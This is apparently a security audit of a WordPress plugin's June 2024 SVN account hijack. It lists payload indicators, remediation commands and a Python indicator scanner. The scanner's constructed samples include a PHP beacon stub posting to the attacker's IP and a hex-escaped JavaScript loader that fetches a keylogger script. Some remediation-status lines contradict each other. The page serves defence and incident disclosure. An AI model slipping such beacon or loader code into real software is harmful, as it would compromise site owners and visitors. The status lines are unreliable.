
Audit #20 Cleaned

Contact Form Multi-Step Addon · 300 installs · baseline trunk@r3071804 → head trunk@r3106511 · suspect committer themerex · by beacon-scan-skill (backfill from Wordfence 2024-06-24 advisory) · closed 1y ago

Actor: June 2024 wp.org credential-stuffing wave (operator unattributed)

Confirmed malicious supply-chain compromise of the themerex SVN account, since recovered by the legitimate maintainer. Between 2024-06-23 22:47 UTC and 2024-06-24 04:10 UTC the themerex account was used to push two malicious "Upgrade" commits (r3106373 + r3106511) to trunk, injecting the canonical June 2024 payload into trx-contact-form-7-multi-step-addon.php. The wp.org Plugin Review Team (frantorres) reverted at r3106781 + r3106787 on 2024-06-24 12:09–12:25 UTC.

Unlike the other 4 plugins in the wave, this one was NOT closed by wp.org — the legitimate themerex maintainer regained control and shipped a clean 1.0.8 security update (r3145379) on 2024-09-02, with continued maintenance through 1.0.10 (2025-03-18). The plugin remains active on wp.org today.

Payload identical to blaze-widget: PHP admin user creation (PluginAUTH, JSON POST to 94.156.79.8/AddSites), cross-CMS recon (PrestaShop/Drupal/Symfony to /CMSUsers), and a JS keylogger loaded via hex-escaped eval from 94.156.79.8/sc-top.js + hostpdf.co/pinche.php. Tags 1.0.6, 1.0.7, 1.0.8, 1.0.10 are visible today — 1.0.6 and 1.0.7 are likely PRT cleanup or pre-malicious tag re-creations; 1.0.8 and onwards are the legitimate themerex security recovery.

Cleanup published — updates flowing through wp.org again

The plugin has been remediated. This audit is retained as a public record of the incident and the IOCs.

If you run contact-form-7-multi-step-addon on your site

Verify your install matches the wp.org canonical version:

wp plugin verify-checksums contact-form-7-multi-step-addon

A patched build isn't yet published for this audit. Check the security advisories index or remove the plugin until one is available.

Or remove the plugin entirely:

wp plugin deactivate contact-form-7-multi-step-addon
wp plugin delete contact-form-7-multi-step-addon
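Beyond the checksum comparison, a defender can sweep the plugin's files for the payload indicators the summary lists, decoding hex-escaped JavaScript literals first so the keylogger's eval wrapper cannot hide the C2 host from the match. This is an added example, not code from this audit or from the plugin; the sample file contents are constructed, and the `wp_remote_post` call in the beacon stub is only a plausible shape for the described JSON POST, not the real payload.

```python
# Added example, not code from the audit or the plugin. Sample contents are constructed.
import re
import tempfile
from pathlib import Path

# Indicators quoted in the audit summary: C2 host, endpoints, auth marker, loader domains.
IOC_STRINGS = ["94.156.79.8", "hostpdf.co", "/AddSites", "/CMSUsers", "PluginAUTH", "sc-top.js"]
HEX_RUN = re.compile(r"(?:\\x[0-9a-fA-F]{2}){4,}")                 # run of \xNN escapes
EVAL_HEX = re.compile(r"eval\s*\(\s*['\"](?:\\x[0-9a-fA-F]{2})+")  # eval() over such a literal

def decode_hex_runs(text: str) -> str:
    """Replace every run of \\xNN escapes with the characters it encodes."""
    return HEX_RUN.sub(lambda m: bytes.fromhex(m.group(0).replace("\\x", "")).decode("latin-1"), text)

def scan_source(text: str) -> list[str]:
    """Indicator names present in one file's contents, matched after de-escaping."""
    decoded = decode_hex_runs(text)
    findings = [ioc for ioc in IOC_STRINGS if ioc in decoded]
    if EVAL_HEX.search(text):                      # the keylogger's hex-escaped eval wrapper
        findings.append("eval(hex-escaped-string)")
    return findings

def scan_plugin_dir(plugin_dir: str) -> dict[str, list[str]]:
    """Scan every .php/.js file below plugin_dir; map POSIX relative path -> findings."""
    hits = {}
    for path in Path(plugin_dir).rglob("*"):
        if path.suffix in (".php", ".js") and path.is_file():
            found = scan_source(path.read_text(encoding="utf-8", errors="replace"))
            if found:
                hits[path.relative_to(plugin_dir).as_posix()] = found
    return hits

# Constructed samples: a benign file, a PHP stub shaped like the described AddSites
# beacon (wp_remote_post is an assumed shape, not the real payload), and a JS loader
# whose script URL is hidden behind hex escapes.
CLEAN_SAMPLE = "<?php add_action('init', 'cf7ms_register_steps');"
BEACON_SAMPLE = "<?php wp_remote_post('http://94.156.79.8/AddSites', ['body' => json_encode(['k' => 'PluginAUTH'])]);"
LOADER_JS = "s=document.createElement('script');s.src='https://94.156.79.8/sc-top.js';"
LOADER_SAMPLE = "eval('" + "".join(f"\\x{ord(c):02x}" for c in LOADER_JS) + "');"

def demo() -> dict[str, list[str]]:
    """Write the samples into a temporary plugin tree and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        Path(tmp, "js").mkdir()
        Path(tmp, "addon.php").write_text(CLEAN_SAMPLE, encoding="utf-8")
        Path(tmp, "inc.php").write_text(BEACON_SAMPLE, encoding="utf-8")
        Path(tmp, "js", "loader.js").write_text(LOADER_SAMPLE, encoding="utf-8")
        return scan_plugin_dir(tmp)

if __name__ == "__main__":
    print(demo())
```

Point `scan_plugin_dir` at `wp-content/plugins/contact-form-7-multi-step-addon` on a live install; any hit warrants the removal steps above, since a clean checksum run cannot vouch for files the canonical build never contained.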

If you're the plugin author

Cleanup steps to clear this label have not yet been documented for this audit. Contact the investigator listed above.

✓ Cleanup confirmed and audit closed.

Plugins under the same committer's SVN access

themerex holds push access to 2 plugins totalling 700k+ active installs. Each non-target plugin scans clean today but represents a one-commit hijack opportunity.

Contact Form Multi-Step Addon — patched / closed audit · 300 installs (of 700k+ across the committer's plugins)